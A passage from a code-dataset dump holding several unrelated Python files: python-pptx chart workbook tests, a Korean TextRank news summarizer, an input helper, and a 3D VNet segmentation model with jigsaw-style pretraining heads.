item)\n","sub_path":"gevent/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25214630","text":"# encoding: utf-8\n\n\"\"\"\nTest suite for pptx.chart.xlsx module\n\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport pytest\n\nfrom xlsxwriter import Workbook\nfrom xlsxwriter.worksheet import Worksheet\n\nfrom pptx.chart.data import (\n BubbleChartData, Categories, CategoryChartData, CategorySeriesData,\n XyChartData\n)\nfrom pptx.chart.xlsx import (\n _BaseWorkbookWriter, BubbleWorkbookWriter, CategoryWorkbookWriter,\n XyWorkbookWriter\n)\nfrom pptx.compat import BytesIO\n\nfrom ..unitutil.mock import ANY, call, class_mock, instance_mock, method_mock\n\n\nclass Describe_BaseWorkbookWriter(object):\n\n def it_can_generate_a_chart_data_Excel_blob(self, xlsx_blob_fixture):\n workbook_writer, xlsx_file_, workbook_, worksheet_, xlsx_blob = (\n xlsx_blob_fixture\n )\n _xlsx_blob = workbook_writer.xlsx_blob\n\n workbook_writer._open_worksheet.assert_called_once_with(xlsx_file_)\n workbook_writer._populate_worksheet.assert_called_once_with(\n workbook_writer, workbook_, worksheet_\n )\n assert _xlsx_blob is xlsx_blob\n\n def it_can_open_a_worksheet_in_a_context(self, open_fixture):\n wb_writer, xlsx_file_, workbook_, worksheet_, Workbook_ = open_fixture\n\n with wb_writer._open_worksheet(xlsx_file_) as (workbook, worksheet):\n Workbook_.assert_called_once_with(xlsx_file_, {'in_memory': True})\n workbook_.add_worksheet.assert_called_once_with()\n assert workbook is workbook_\n assert worksheet is worksheet_\n workbook_.close.assert_called_once_with()\n\n def it_raises_on_no_override_of_populate(self, populate_fixture):\n workbook_writer = populate_fixture\n with pytest.raises(NotImplementedError):\n workbook_writer._populate_worksheet(None, None)\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture\n def open_fixture(self, xlsx_file_, workbook_, worksheet_, Workbook_):\n workbook_writer = _BaseWorkbookWriter(None)\n workbook_.add_worksheet.return_value = worksheet_\n return workbook_writer, xlsx_file_, workbook_, worksheet_, Workbook_\n\n @pytest.fixture\n def populate_fixture(self):\n workbook_writer = _BaseWorkbookWriter(None)\n return workbook_writer\n\n @pytest.fixture\n def xlsx_blob_fixture(\n self, request, xlsx_file_, workbook_, worksheet_,\n _populate_worksheet_, _open_worksheet_, BytesIO_):\n workbook_writer = _BaseWorkbookWriter(None)\n xlsx_blob = 'fooblob'\n BytesIO_.return_value = xlsx_file_\n # to make context manager behavior work\n _open_worksheet_.return_value.__enter__.return_value = (\n workbook_, worksheet_\n )\n xlsx_file_.getvalue.return_value = xlsx_blob\n return (\n workbook_writer, xlsx_file_, workbook_, worksheet_, xlsx_blob\n )\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def BytesIO_(self, request):\n return class_mock(request, 'pptx.chart.xlsx.BytesIO')\n\n @pytest.fixture\n def _open_worksheet_(self, request):\n return method_mock(request, _BaseWorkbookWriter, '_open_worksheet')\n\n @pytest.fixture\n def _populate_worksheet_(self, request):\n return method_mock(\n request, _BaseWorkbookWriter, '_populate_worksheet',\n autospec=True\n )\n\n @pytest.fixture\n def Workbook_(self, request, workbook_):\n return class_mock(\n request, 'pptx.chart.xlsx.Workbook', return_value=workbook_\n )\n\n @pytest.fixture\n def workbook_(self, request):\n 
return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n @pytest.fixture\n def xlsx_file_(self, request):\n return instance_mock(request, BytesIO)\n\n\nclass DescribeCategoryWorkbookWriter(object):\n\n def it_knows_the_categories_range_ref(self, categories_ref_fixture):\n workbook_writer, expected_value = categories_ref_fixture\n assert workbook_writer.categories_ref == expected_value\n\n def it_raises_on_cat_ref_on_no_categories(self, cat_ref_raises_fixture):\n workbook_writer = cat_ref_raises_fixture\n with pytest.raises(ValueError):\n workbook_writer.categories_ref\n\n def it_knows_the_ref_for_a_series_name(self, ser_name_ref_fixture):\n workbook_writer, series_, expected_value = ser_name_ref_fixture\n assert workbook_writer.series_name_ref(series_) == expected_value\n\n def it_knows_the_values_range_ref(self, values_ref_fixture):\n workbook_writer, series_, expected_value = values_ref_fixture\n assert workbook_writer.values_ref(series_) == expected_value\n\n def it_can_populate_a_worksheet_with_chart_data(self, populate_fixture):\n workbook_writer, workbook_, worksheet_, expected_calls = (\n populate_fixture\n )\n workbook_writer._populate_worksheet(workbook_, worksheet_)\n assert worksheet_.mock_calls == expected_calls\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture(params=[\n (1, 1, 'Sheet1!$A$2:$A$2'),\n (1, 3, 'Sheet1!$A$2:$A$4'),\n (2, 4, 'Sheet1!$A$2:$B$5'),\n (3, 8, 'Sheet1!$A$2:$C$9'),\n ])\n def categories_ref_fixture(self, request, chart_data_, categories_):\n depth, leaf_count, expected_value = request.param\n workbook_writer = CategoryWorkbookWriter(chart_data_)\n chart_data_.categories = categories_\n categories_.depth, categories_.leaf_count = depth, leaf_count\n return workbook_writer, expected_value\n\n @pytest.fixture\n def cat_ref_raises_fixture(self, request, chart_data_, categories_):\n workbook_writer = CategoryWorkbookWriter(chart_data_)\n chart_data_.categories = categories_\n categories_.depth = 0\n return workbook_writer\n\n @pytest.fixture(params=[\n ([[[0, 'a'], [1, 'b'], [2, 'c']]],\n [(1, 0, 'a'), (2, 0, 'b'), (3, 0, 'c')],\n [('s1', (1, 2, 3)), ('s2', (4, 5, 6))],\n [((0, 1, 's1'), (1, 1, (1, 2, 3), ANY)),\n ((0, 2, 's2'), (1, 2, (4, 5, 6), ANY))]),\n\n ([[[0, 'CA'], [1, 'NV'], [2, 'NY'], [3, 'NJ']],\n [[0, 'WEST'], [2, 'EAST']]],\n [(1, 1, 'CA'), (2, 1, 'NV'), (3, 1, 'NY'), (4, 1, 'NJ'),\n (1, 0, 'WEST'), (3, 0, 'EAST')],\n [('s1', (1, 2, 3, 4)), ('s2', (5, 6, 7, 8))],\n [((0, 2, 's1'), (1, 2, (1, 2, 3, 4), ANY)),\n ((0, 3, 's2'), (1, 3, (5, 6, 7, 8), ANY))]),\n ])\n def populate_fixture(\n self, request, chart_data_, workbook_, worksheet_, categories_):\n levels, cat_call_args, ser_data, ser_call_args = request.param\n\n workbook_writer = CategoryWorkbookWriter(chart_data_)\n\n sers = []\n for idx, (name, values) in enumerate(ser_data):\n ser = instance_mock(\n request, CategorySeriesData, index=idx, values=values\n )\n ser.name = name\n sers.append(ser)\n\n expected_calls = [call.write(*args) for args in cat_call_args]\n for name_args, col_args in ser_call_args:\n expected_calls.extend([\n call.write(*name_args), call.write_column(*col_args)\n ])\n\n chart_data_.categories = categories_\n categories_.depth = len(levels)\n categories_.levels = levels\n chart_data_.__iter__.return_value = iter(sers)\n return workbook_writer, workbook_, worksheet_, expected_calls\n\n @pytest.fixture(params=[\n (1, 0, 'Sheet1!$B$1'),\n (1, 3, 
'Sheet1!$E$1'),\n (3, 0, 'Sheet1!$D$1'),\n (3, 3, 'Sheet1!$G$1'),\n ])\n def ser_name_ref_fixture(self, request, series_data_, categories_):\n cat_depth, series_index, expected_value = request.param\n workbook_writer = CategoryWorkbookWriter(None)\n series_data_.categories = categories_\n categories_.depth = cat_depth\n series_data_.index = series_index\n return workbook_writer, series_data_, expected_value\n\n @pytest.fixture(params=[\n (1, 0, 3, 'Sheet1!$B$2:$B$4'),\n (1, 1, 3, 'Sheet1!$C$2:$C$4'),\n (2, 0, 5, 'Sheet1!$C$2:$C$6'),\n (3, 2, 7, 'Sheet1!$F$2:$F$8'),\n ])\n def values_ref_fixture(self, request, series_data_, categories_):\n cat_depth, ser_idx, val_count, expected_value = request.param\n workbook_writer = CategoryWorkbookWriter(None)\n series_data_.categories = categories_\n categories_.depth = cat_depth\n series_data_.index = ser_idx\n series_data_.__len__.return_value = val_count\n return workbook_writer, series_data_, expected_value\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def categories_(self, request):\n return instance_mock(request, Categories)\n\n @pytest.fixture\n def chart_data_(self, request):\n return instance_mock(request, CategoryChartData)\n\n @pytest.fixture\n def series_data_(self, request):\n return instance_mock(request, CategorySeriesData)\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n\nclass DescribeBubbleWorkbookWriter(object):\n\n def it_can_populate_a_worksheet_with_chart_data(self, populate_fixture):\n workbook_writer, workbook_, worksheet_, expected_calls = (\n populate_fixture\n )\n workbook_writer._populate_worksheet(workbook_, worksheet_)\n assert worksheet_.mock_calls == expected_calls\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture\n def populate_fixture(self, workbook_, worksheet_):\n chart_data = BubbleChartData()\n series_1 = chart_data.add_series('Series 1')\n for pt in ((1, 1.1, 10), (2, 2.2, 20)):\n series_1.add_data_point(*pt)\n series_2 = chart_data.add_series('Series 2')\n for pt in ((3, 3.3, 30), (4, 4.4, 40)):\n series_2.add_data_point(*pt)\n\n workbook_writer = BubbleWorkbookWriter(chart_data)\n\n expected_calls = [\n call.write_column(1, 0, [1, 2], ANY),\n call.write(0, 1, 'Series 1'),\n call.write_column(1, 1, [1.1, 2.2], ANY),\n call.write(0, 2, 'Size'),\n call.write_column(1, 2, [10, 20], ANY),\n\n call.write_column(5, 0, [3, 4], ANY),\n call.write(4, 1, 'Series 2'),\n call.write_column(5, 1, [3.3, 4.4], ANY),\n call.write(4, 2, 'Size'),\n call.write_column(5, 2, [30, 40], ANY),\n ]\n return workbook_writer, workbook_, worksheet_, expected_calls\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n\nclass DescribeXyWorkbookWriter(object):\n\n def it_can_generate_a_chart_data_Excel_blob(self, xlsx_blob_fixture):\n workbook_writer, _open_worksheet_, xlsx_file_ = xlsx_blob_fixture[:3]\n _populate_worksheet_, workbook_, worksheet_ = xlsx_blob_fixture[3:6]\n xlsx_blob_ = xlsx_blob_fixture[6]\n\n xlsx_blob = workbook_writer.xlsx_blob\n\n _open_worksheet_.assert_called_once_with(xlsx_file_)\n _populate_worksheet_.assert_called_once_with(workbook_, worksheet_)\n assert xlsx_blob is 
xlsx_blob_\n\n def it_can_populate_a_worksheet_with_chart_data(self, populate_fixture):\n workbook_writer, workbook_, worksheet_, expected_calls = (\n populate_fixture\n )\n workbook_writer._populate_worksheet(workbook_, worksheet_)\n assert worksheet_.mock_calls == expected_calls\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture\n def populate_fixture(self, workbook_, worksheet_):\n chart_data = XyChartData()\n series_1 = chart_data.add_series('Series 1')\n for pt in ((1, 1.1), (2, 2.2)):\n series_1.add_data_point(*pt)\n series_2 = chart_data.add_series('Series 2')\n for pt in ((3, 3.3), (4, 4.4)):\n series_2.add_data_point(*pt)\n\n workbook_writer = XyWorkbookWriter(chart_data)\n\n expected_calls = [\n call.write_column(1, 0, [1, 2], ANY),\n call.write(0, 1, 'Series 1'),\n call.write_column(1, 1, [1.1, 2.2], ANY),\n\n call.write_column(5, 0, [3, 4], ANY),\n call.write(4, 1, 'Series 2'),\n call.write_column(5, 1, [3.3, 4.4], ANY)\n ]\n return workbook_writer, workbook_, worksheet_, expected_calls\n\n @pytest.fixture\n def xlsx_blob_fixture(\n self, request, xlsx_file_, BytesIO_, _open_worksheet_, workbook_,\n worksheet_, _populate_worksheet_, xlsx_blob_):\n workbook_writer = XyWorkbookWriter(None)\n return (\n workbook_writer, _open_worksheet_, xlsx_file_,\n _populate_worksheet_, workbook_, worksheet_, xlsx_blob_\n )\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def BytesIO_(self, request, xlsx_file_):\n return class_mock(\n request, 'pptx.chart.xlsx.BytesIO', return_value=xlsx_file_\n )\n\n @pytest.fixture\n def _open_worksheet_(self, request, workbook_, worksheet_):\n open_worksheet_ = method_mock(\n request, XyWorkbookWriter, '_open_worksheet'\n )\n # to make context manager behavior work\n open_worksheet_.return_value.__enter__.return_value = (\n workbook_, worksheet_\n )\n return open_worksheet_\n\n @pytest.fixture\n def _populate_worksheet_(self, request):\n return method_mock(request, XyWorkbookWriter, '_populate_worksheet')\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n @pytest.fixture\n def xlsx_blob_(self, request):\n return instance_mock(request, bytes)\n\n @pytest.fixture\n def xlsx_file_(self, request, xlsx_blob_):\n xlsx_file_ = instance_mock(request, BytesIO)\n xlsx_file_.getvalue.return_value = xlsx_blob_\n return xlsx_file_\n","sub_path":"tests/chart/test_xlsx.py","file_name":"test_xlsx.py","file_ext":"py","file_size_in_byte":14549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"641386587","text":"# -*- coding: utf-8 -*-\nfrom konlpy.tag import Mecab\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom crawler import news_document_class as nd\nimport numpy as np\nimport re\n\n'''\n주어진 문���를 n줄로 요약하는 메소드인 get_n_summary와 문서에서 tfidf[count] vector[matrix]를 구하는 메소드 선언\n'''\n\n\nclass text_rank:\n def __init__(self, text):\n self.text = nd.prettify_sentences(text)\n self.sentences_n = len(text.split(\".\"))\n self.summary_n = None\n\n def select_summary_n(self):\n self.summary_n = 10\n n_class = [(3, range(0, 11)),\n (3, range(11, 21)),\n (4, range(21, 31)),\n (5, range(31, 41)),\n (6, range(41, 51)),\n (7, range(51, 101))]\n for x in n_class:\n if self.sentences_n in x[1]:\n # print(x[1])\n self.summary_n = x[0]\n 
break\n\n def doc_to_stemmed_words(self) :\n '''\n 뉴스기사의 각 문장에서 추출한 단어의 어근들을 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: 각 문장에서 추출한 단어의 어근들의 리스트를 원소로 갖는 리스트 (nested list)\n '''\n\n sentences = (self.text).split(\".\")\n\n #kkma = Kkma()\n #remove_pos = \"[(?P<조사>JK.*)(?P<접속조사>JC.*)(?P<전성어미>ET.*)(?P<종결어미>EF.*)(?P<연결어미>EC.*)(?P<접미사>XS.*)(?P<마침표물음표느낌표>SF.*)(?P<쉼표가운뎃점콜론빗금>SP.*)]\" #kkma\n mecab = Mecab()\n remove_pos = \"[(?P<조사>JK.*)(?P<접속조사>JC.*)(?P<전성어미>ET.*)(?P<종결어미>EF.*)(?P<연결어미>EC.*)(?P<접미사>XS.*)(?P<마침표물음표느낌표>SF.*)(?P<쉼표가운뎃점콜론빗금>SC.*)]\" # mecab\n\n stemmed_sentences = []\n\n for sentence in sentences :\n # stemmed_words = kkma.pos(sentence)\n stemmed_words = mecab.pos(sentence)\n stemmed_words = [x[0] for x in stemmed_words if not bool(re.match(remove_pos, x[1]))]\n stemmed_sentences.append(stemmed_words)\n\n return stemmed_sentences\n\n def get_tfidf_vector(self) :\n '''\n 어근 추출된 뉴스 기사의 단어 벡터와 그 단어들의 tfidf 값을 원소로 갖는 벡터를 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: tfidf를 구한 어근을 원소로 갖는 리스트 (list), tfidf 값을 원소로 갖는 리스트 (list)\n '''\n\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n tfidf = TfidfVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n stemmed_article = [\" \".join(stemmed_article)]\n tfidf_vec = np.ndarray.tolist(np.squeeze(tfidf.fit_transform(stemmed_article).toarray()))\n feature_name = tfidf.get_feature_names()\n\n return feature_name, tfidf_vec\n\n def get_tfidf_matrix(self) :\n '''\n 어근 추출된 뉴스 기사의 각 문장의 단어 리스트와 그 단어들의 tfidf 값을 원소로 갖는 행렬을 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: tfidf를 구한 어근을 원소로 갖는 리스트 (list), tfidf 값을 원소로 갖는 이중 리스트 (nested list)\n '''\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n tfidf = TfidfVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n tfidf_mat = tfidf.fit_transform(stemmed_article).toarray()\n feature_name = tfidf.get_feature_names()\n\n return feature_name, tfidf_mat\n\n def get_count_vector(self) :\n '''\n 어근 추출된 뉴스 기사의 단어 벡터와 그 단어들의 count값을 원소로 갖는 벡터를 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: count를 구한 어근을 원소로 갖는 리스트 (list), count값을 원소로 갖는 리스트 (list)\n '''\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n cnt_vec = CountVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n stemmed_article = [\" \".join(stemmed_article)]\n count_vec = np.ndarray.tolist(np.squeeze(cnt_vec.fit_transform(stemmed_article).toarray()))\n feature_name = cnt_vec.get_feature_names()\n\n return feature_name, count_vec\n\n def get_count_matrix(self) :\n '''\n 어근 추출된 뉴스 기사의 단어 벡터와 그 단어들의 count 값을 원소로 갖는 행렬을 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: count를 구한 어근을 원소로 갖는 리스트 (list), count 값을 원소로 갖는 이중 리스트 (nested 
list)\n        '''\n        stemmed_sentences = self.doc_to_stemmed_words()\n        remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # characters other than Korean, digits, and English letters\n\n        cnt_vec = CountVectorizer()\n\n        stemmed_article = []\n        for stemmed_words in stemmed_sentences :\n            sentence = \" \".join(stemmed_words) # use the stemmed words\n            sentence = remove_pattern.sub(\"\", sentence) # drop other characters # needed when showing the original sentence, but unnecessary for building the vector map\n            stemmed_article.append(sentence)\n\n        count_vec = np.ndarray.tolist(np.squeeze(cnt_vec.fit_transform(stemmed_article).toarray()))\n        feature_name = cnt_vec.get_feature_names()\n\n        return feature_name, count_vec\n\n    def get_textrank_from_text(self) :\n        '''\n        Build the text rank graph between sentences from their tfidf matrix and compute each sentence's text rank value.\n        Return the sentence numbers and their textrank values as a dictionary.\n        :param text: news article text (string)\n        :param n: number of lines to summarize into (integer)\n        :return: dictionary with sentence index as key and text rank as value (dictionary)\n        '''\n        _, tfidf_mat = self.get_tfidf_matrix()\n        tfidf_mat = np.asarray(tfidf_mat)\n\n        d = 0.85 # d = damping factor\n        tfidf_graph = np.dot(tfidf_mat, tfidf_mat.T)\n        matrix_size = tfidf_graph.shape[0]\n\n        for id in range(matrix_size):\n            tfidf_graph[id, id] = 0 # zero out the diagonal\n            link_sum = np.sum(tfidf_graph[:, id]) # A[:, id] = A[:][id]\n            if link_sum != 0:\n                tfidf_graph[:, id] /= link_sum\n            tfidf_graph[:, id] *= -d\n            tfidf_graph[id, id] = 1\n\n        B = (1-d) * np.ones((matrix_size, 1))\n        ranks = np.linalg.solve(tfidf_graph, B) # solve the linear system Ax = b\n        textrank_dictionary = {idx: r[0] for idx, r in enumerate(ranks)}\n\n        return textrank_dictionary\n\n    def get_summary(self):\n        '''\n        Using the returned indices, return the n most important sentences of the whole news article, in document order.\n        :param text: news article text (string)\n        :param n: number of lines to summarize into (integer)\n        :return: list containing the top n sentences (list)\n        '''\n        self.select_summary_n()\n        n = self.summary_n\n        article = [x+\".\" for x in (self.text).split(\".\")]\n        textrank_dictionary = self.get_textrank_from_text()\n        sorted_textrank = sorted(textrank_dictionary, key=lambda k: textrank_dictionary[k], reverse=True)[0:n]\n        sorted_textrank.sort()\n\n        summary = []\n        for idx in sorted_textrank:\n            summary.append(article[idx])\n\n        join_summary = \" \".join(summary)\n\n        return join_summary\n","sub_path":"crawler/text_rank.py","file_name":"text_rank.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"432527980","text":"\n\ndef getInputNumber(min, max, prompt):\n\tinput_correct = False\n\twhile (input_correct == False):\n\t\ttry:\n\t\t\tnumber = int(input (prompt))\n\t\texcept ValueError:\n\t\t\tprint (\"This is not a number.\")\n\t\t\tcontinue\n\t\tif ((min <= number) and (number <= max)):\n\t\t\treturn number\n\t\telse:\n\t\t\tprint (\"Number out of range.\")\n","sub_path":"src/helpers/getInputNumber.py","file_name":"getInputNumber.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"649751530","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np \n\nfrom .utils import Normalize, JigsawHead\nfrom .hungarian import Hungarian\n\ndef passthrough(x, **kwargs):\n    return x\n\ndef ELUCons(elu, nchan):\n    if elu:\n        return nn.ELU(inplace=True)\n    else:\n        return nn.PReLU(nchan)\n\n# normalization between sub-volumes is necessary\n# for good performance\nclass ContBatchNorm3d(nn.modules.batchnorm._BatchNorm):\n    def _check_input_dim(self, input):\n        if input.dim() != 5:\n            raise ValueError('expected 5D 
input (got {}D input)'\n .format(input.dim()))\n # super(ContBatchNorm3d, self)._check_input_dim(input)\n\n def forward(self, input):\n self._check_input_dim(input)\n return F.batch_norm(\n input, self.running_mean, self.running_var, self.weight, self.bias,\n True, self.momentum, self.eps)\n\n\nclass LUConv(nn.Module):\n def __init__(self, nchan, elu):\n super(LUConv, self).__init__()\n self.relu1 = ELUCons(elu, nchan)\n self.conv1 = nn.Conv3d(nchan, nchan, kernel_size=5, padding=2)\n self.bn1 = ContBatchNorm3d(nchan)\n\n def forward(self, x):\n out = self.relu1(self.bn1(self.conv1(x)))\n return out\n\n\ndef _make_nConv(nchan, depth, elu):\n layers = []\n for _ in range(depth):\n layers.append(LUConv(nchan, elu))\n return nn.Sequential(*layers)\n\n\nclass InputTransition(nn.Module):\n def __init__(self, inChans, elu, outChans=16):\n super().__init__()\n self.conv = torch.nn.Sequential(\n torch.nn.Conv3d(inChans, outChans, 3, padding=1),\n ContBatchNorm3d(outChans),\n ELUCons(elu, outChans),\n\n torch.nn.Conv3d(outChans, outChans, 3, padding=1),\n ContBatchNorm3d(outChans),\n ELUCons(elu, outChans),\n )\n\n def forward(self, x):\n x = self.conv(x)\n\n return x\n\n\nclass DownTransition(nn.Module):\n def __init__(self, inChans, nConvs, elu, dropout=False):\n super(DownTransition, self).__init__()\n outChans = 2 * inChans\n self.down_conv = nn.Conv3d(inChans, outChans, kernel_size=2, stride=2)\n self.bn1 = ContBatchNorm3d(outChans)\n self.do1 = passthrough\n self.relu1 = ELUCons(elu, outChans)\n self.relu2 = ELUCons(elu, outChans)\n if dropout:\n self.do1 = nn.Dropout3d()\n self.ops = _make_nConv(outChans, nConvs, elu)\n\n def forward(self, x):\n down = self.relu1(self.bn1(self.down_conv(x)))\n out = self.do1(down)\n out = self.ops(out)\n out = self.relu2(torch.add(out, down))\n return out\n\n\nclass UpTransition(nn.Module):\n def __init__(self, inChans, outChans, nConvs, elu, dropout=False):\n super(UpTransition, self).__init__()\n self.up_conv = nn.ConvTranspose3d(inChans, outChans // 2, kernel_size=2, stride=2)\n self.bn1 = ContBatchNorm3d(outChans // 2)\n self.do1 = passthrough\n # self.do2 = nn.Dropout3d()\n self.do2 = passthrough\n self.relu1 = ELUCons(elu, outChans // 2)\n self.relu2 = ELUCons(elu, outChans)\n if dropout:\n self.do1 = nn.Dropout3d()\n self.ops = _make_nConv(outChans, nConvs, elu)\n\n def forward(self, x, skipx):\n out = self.do1(x)\n skipxdo = self.do2(skipx)\n out = self.relu1(self.bn1(self.up_conv(out)))\n xcat = torch.cat((out, skipxdo), 1)\n out = self.ops(xcat)\n out = self.relu2(torch.add(out, xcat))\n return out\n\n\nclass OutputTransition(nn.Module):\n def __init__(self, inChans, elu, n_classes):\n super(OutputTransition, self).__init__()\n self.conv1 = nn.Conv3d(inChans, inChans // 2, kernel_size=3, padding=1)\n self.bn1 = ContBatchNorm3d(inChans // 2)\n self.conv2 = nn.Conv3d(inChans // 2, n_classes, kernel_size=1)\n self.relu1 = ELUCons(elu, inChans // 2)\n\n def forward(self, x):\n # convolve 32 down to n_classes channels\n out = self.relu1(self.bn1(self.conv1(x)))\n out = self.conv2(out)\n return out\n\n\n\nclass VNet(nn.Module):\n # the number of convolutions in each layer corresponds\n # to what is in the actual prototxt, not the intent\n def __init__(self, n_channels, n_classes, input_size = 64, elu=False, pretrain = False, feat_dim=128, jigsaw = False):\n super(VNet, self).__init__()\n self.in_tr = InputTransition(n_channels, elu)\n self.down_tr32 = DownTransition(16, 1, elu)\n self.down_tr64 = DownTransition(32, 2, elu)\n self.down_tr128 = 
DownTransition(64, 3, elu)\n self.down_tr256 = DownTransition(128, 2, elu)\n self.up_tr256 = UpTransition(256, 256, 2, elu)\n self.up_tr128 = UpTransition(256, 128, 2, elu)\n self.up_tr64 = UpTransition(128, 64, 1, elu)\n self.up_tr32 = UpTransition(64, 32, 1, elu)\n self.out_tr = OutputTransition(32, elu, n_classes)\n self.pretrain = pretrain\n \n self.unary_fc = nn.Sequential(\n nn.AvgPool1d(4,4),\n nn.Flatten(), \n nn.Linear(16384 * 2, 4096),\n nn.Linear(4096, 64),\n )\n\n self.binary_fc = nn.Sequential(\n nn.Linear(16384 * 2, 512),\n nn.Linear(512, 7)\n )\n\n self.head = nn.Sequential(\n nn.Linear(16384, 1024),\n nn.Linear(1024, 128),\n Normalize(2)\n )\n\n def forward(self, x, u_label, b_label):\n tower_size = x.shape[0]\n x = x.transpose(0, 1)\n out16 = self.in_tr(x)\n out32 = self.down_tr32(out16)\n out64 = self.down_tr64(out32)\n out128 = self.down_tr128(out64)\n out256 = self.down_tr256(out128)\n\n unary_list = []\n perm_list = []\n cur_perm = u_label.squeeze(-1)\n\n ## first iter\n \n #out = self.up_tr256(out256, out128)\n #out = self.up_tr128(out, out64)\n #out = self.up_tr64(out, out32)\n #out = self.up_tr32(out, out16)\n #out = self.out_tr(out)\n\n features = torch.reshape(out256, \\\n (tower_size, 1, \\\n 8 * 16384))\n u_out = self.unary_fc(features)\n u_out = u_out.view(tower_size, 8, 8)\n u_out = F.log_softmax(u_out, 2)\n unary_list.append(u_out)\n perm_list.append(cur_perm)\n \n for iter_id in range(5 - 1):\n ### hungarian algorithm for new permutation\n out_detach = u_out.detach().cpu().numpy()\n feature_stack_detach = out256.detach().cpu().numpy()\n hungarian = Hungarian()\n\n new_feature_stack = np.zeros_like(feature_stack_detach)\n results_stack = np.zeros((tower_size, 8))\n\n for i in range(tower_size):\n hungarian.calculate(-1 * out_detach[i,:,:])\n results = hungarian.get_results()\n\n for j in range(8):\n new_feature_stack[i, results[j][1], :] = \\\n feature_stack_detach[i, results[j][0], :]\n results_stack[i, results[j][1]] = results[j][0]\n\n results_stack = torch.from_numpy(results_stack).long().cuda()\n cur_perm = torch.gather(cur_perm, 1, results_stack)\n perm_list.append(cur_perm)\n\n ### new iteration\n feature_stack = torch.from_numpy(new_feature_stack).float().cuda()\n features = torch.reshape(feature_stack, \\\n (tower_size, 1, \\\n 8 * 16384))\n\n u_out = self.unary_fc(features)\n u_out = u_out.view(tower_size, 8, 8)\n u_out = F.log_softmax(u_out, 2)\n unary_list.append(u_out)\n\n \n # binary loss\n binary_list = []\n for i in range(8):\n for j in range(i + 1, 8):\n feature_pair = torch.cat([out256[i].view(1, -1), \\\n out256[j].view(1, -1)], dim=1)\n b_out = self.binary_fc(feature_pair)\n b_out = F.log_softmax(b_out, 1)\n binary_list.append(b_out)\n\n binary_stack = torch.stack(binary_list, dim=1)\n binary_stack = binary_stack.view(-1, 7)\n \n return None, self.head(out256.view(8, -1)), unary_list, perm_list, binary_stack","sub_path":"uda/models/vnet_parallel_jigsaw.py","file_name":"vnet_parallel_jigsaw.py","file_ext":"py","file_size_in_byte":8363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"234166467","text":"# Copyright (c) 2016 Mellanox Technologies, Ltd\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
